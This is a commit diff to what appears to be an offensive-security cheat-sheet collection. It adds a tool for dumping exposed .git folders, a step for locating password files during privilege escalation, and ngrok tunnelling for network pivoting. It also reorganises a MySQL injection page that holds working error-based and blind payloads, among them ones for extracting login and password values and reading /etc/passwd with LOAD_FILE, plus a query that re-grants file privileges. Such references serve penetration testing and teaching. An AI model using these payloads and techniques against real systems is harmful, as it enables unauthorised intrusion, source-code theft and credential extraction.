GoGitDumper + MySQL summary rewrite

Insecure Source Code Management/README.md

@@ -3,6 +3,7 @@
 - [GIT - Source code management](#git---source-code-management)
   - [Github example with a .git](#github-example-with-a-git)
   - [Automatic way : diggit.py](#automatic-way--diggitpy)
+  - [Automatic way : GoGitDumper](#automatic-way-gogitdumper)
   - [Automatic way : rip-git](#automatic-way--rip-git)
   - [Automatic way : GitHack](#automatic-way--githack)
   - [Harvesting secrets : trufflehog](#harvesting-secrets--trufflehog)
@@ -108,6 +109,15 @@ sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
 -o is a hash of particular Git object to download
 ```
 
+### Automatic way : GoGitDumper
+
+```powershell
+go get github.com/c-sto/gogitdumper
+gogitdumper -u http://urlhere.com/.git/ -o yourdecideddir/.git/
+git log
+git checkout
+```
+
 ### Automatic way : rip-git
 
 ```powershell

Methodology and Resources/Linux - Privilege Escalation.md

@@ -17,6 +17,7 @@
     * [Files containing passwords](#files-containing-passwords)
     * [Last edited files](#last-edited-files)
     * [In memory passwords](#in-memory-passwords)
+    * [Find sensitive files](#find-sensitive-files)
 * [Scheduled tasks](#scheduled-tasks)
     * [Cron jobs](#cron-jobs)
     * [Systemd timers](#systemd-timers)
@@ -139,6 +140,18 @@ find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
 strings /dev/mem -n10 | grep -i PASS
 ```
 
+### Find sensitive files
+
+```powershell
+$ locate password | more           
+/boot/grub/i386-pc/password.mod
+/etc/pam.d/common-password
+/etc/pam.d/gdm-password
+/etc/pam.d/gdm-password.original
+/lib/live/config/0031-root-password
+...
+```
+
 ## Scheduled tasks
 
 ### Cron jobs

Methodology and Resources/Network Pivoting Techniques.md

@@ -130,6 +130,22 @@ plink -l root -pw mypassword 192.168.18.84 -R
 plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
 ```
 
+## ngrok
+
+```powershell
+# get the binary
+wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
+unzip ngrok-stable-linux-amd64.zip 
+
+# log into the service
+./ngrok authtoken 3U[REDACTED_TOKEN]Hm
+
+# deploy a port forwarding for 4433
+./ngrok http 4433
+./ngrok tcp 4433
+```
+
+
 ## Basic Pivoting Types
 
 | Type              | Use Case                                    |

SQL Injection/MySQL Injection.md

@@ -8,13 +8,15 @@
     * [Extract database with information_schema](#extract-database-with-information-schema)
     * [Extract data without information_schema](#extract-data-without-information-schema)
     * [Extract data without columns name](#extract-data-without-columns-name)
-* [MYSQL Error Based - Basic](#mysql-error-based---basic)
-* [MYSQL Error Based - UpdateXML function](#mysql-error-based---updatexml-function)
-* [MYSQL Error Based - Extractvalue function](#mysql-error-based---extractvalue-function)
-* [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent)
-* [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement)
-* [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set)
-* [MYSQL Blind with LIKE](#mysql-blind-with-like)
+* [MYSQL Error Based](#mysql-error-based)
+    * [MYSQL Error Based - Basic](#mysql-error-based---basic)
+    * [MYSQL Error Based - UpdateXML function](#mysql-error-based---updatexml-function)
+    * [MYSQL Error Based - Extractvalue function](#mysql-error-based---extractvalue-function)
+* [MYSQL Blind](#mysql-blind)
+    * [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent)
+    * [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement)
+    * [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set)
+    * [MYSQL Blind with LIKE](#mysql-blind-with-like)
 * [MYSQL Time Based](#mysql-time-based)
 * [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot)
 * [MYSQL Read content of a file](#mysql-read-content-of-a-file)
@@ -108,7 +110,12 @@ MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union se
 ```
 
 
-## MYSQL Error Based - Basic
+
+
+
+## MYSQL Error Based
+
+### MYSQL Error Based - Basic
 
 Works with `MySQL >= 4.1`
 
@@ -117,7 +124,7 @@ Works with `MySQL >= 4.1`
 '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
 ```
 
-## MYSQL Error Based - UpdateXML function
+### MYSQL Error Based - UpdateXML function
 
 ```sql
 AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
@@ -134,7 +141,7 @@ Shorter to read:
 ' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
 ```
 
-## MYSQL Error Based - Extractvalue function
+### MYSQL Error Based - Extractvalue function
 
 Works with `MySQL >= 5.1`
 
@@ -146,7 +153,9 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(12
 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
 ```
 
-## MYSQL Blind with substring equivalent
+## MYSQL Blind
+
+### MYSQL Blind with substring equivalent
 
 ```sql
 ?id=1 and substring(version(),1,1)=5
@@ -156,7 +165,7 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)
 ?id=1 and (select mid(version(),1,1)=4)
 ```
 
-## MYSQL Blind using a conditional statement
+### MYSQL Blind using a conditional statement
 
 TRUE: `if @@version starts with a 5`:
 
@@ -174,7 +183,7 @@ Response:
 HTTP/1.1 200 OK
 ```
 
-## MYSQL Blind with MAKE_SET
+### MYSQL Blind with MAKE_SET
 
 ```sql
 AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
@@ -183,7 +192,7 @@ AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
 AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
 ```
 
-## MYSQL Blind with LIKE
+### MYSQL Blind with LIKE
 
 ['_'](https://www.w3resource.com/sql/wildcards-like-operator/wildcards-underscore.php) acts like the regex character '.', use it to speed up your blind testing
 
@@ -221,6 +230,12 @@ Need the `filepriv`, otherwise you will get the error : `ERROR 1290 (HY000): The
 ' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
 ```
 
+If you are `root` on the database, you can re-enable the `LOAD_FILE` using the following query
+
+```sql
+GRANT FILE ON *.* TO 'root'@'localhost'; FLUSH PRIVILEGES;#
+```
+
 ## MYSQL Write a shell
 
 ```sql
@@ -265,3 +280,5 @@ load data infile '\\\\error\\abc' into table database.table_name;
 - [[Sqli] Extracting data without knowing columns names - Ahmed Sultan @0x4148](https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/)
 - [Help по MySql инъекциям - rdot.org](https://rdot.org/forum/showpost.php?p=114&postcount=1)
 - [SQL Truncation Attack - Warlock](https://resources.infosecinstitute.com/sql-truncation-attack/)
+- [HackerOne @ajxchapman 50m-ctf writeup - Alex Chapman @ajxchapman](https://hackerone.com/reports/508123)
+- [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased)